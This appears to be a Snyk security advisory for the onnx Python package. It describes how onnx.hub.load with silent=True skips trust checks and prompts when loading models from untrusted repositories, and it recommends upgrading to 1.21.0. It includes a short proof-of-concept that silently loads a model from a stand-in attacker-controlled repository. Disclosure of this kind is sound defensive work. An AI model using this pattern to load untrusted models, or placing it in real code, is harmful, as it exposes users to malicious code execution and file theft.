This vulnerability is trending on Twitter; this may indicate a growing threat.
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade onnx to version 1.21.0 or higher.
onnx is an Open Neural Network Exchange
Affected versions of this package are vulnerable to Resources Downloaded over Insecure Protocol via the onnx.hub.load function when the silent parameter is set to True. An attacker can bypass repository trust verification and suppress all security warnings and confirmation prompts by exploiting this logic, allowing the download and execution of malicious models from attacker-controlled repositories without user notification. This enables the attacker to exfiltrate sensitive files from the victim's machine upon model loading.
import onnx
# Attacker-controlled repository containing a malicious model
EVIL_REPO = "attacker-account/malicious-models:main"
# This call loads the model WITHOUT any warning or prompt
model = onnx.hub.load(
"ResNet50",
repo=EVIL_REPO,
silent=True
)
print("Model loaded silently from untrusted source.")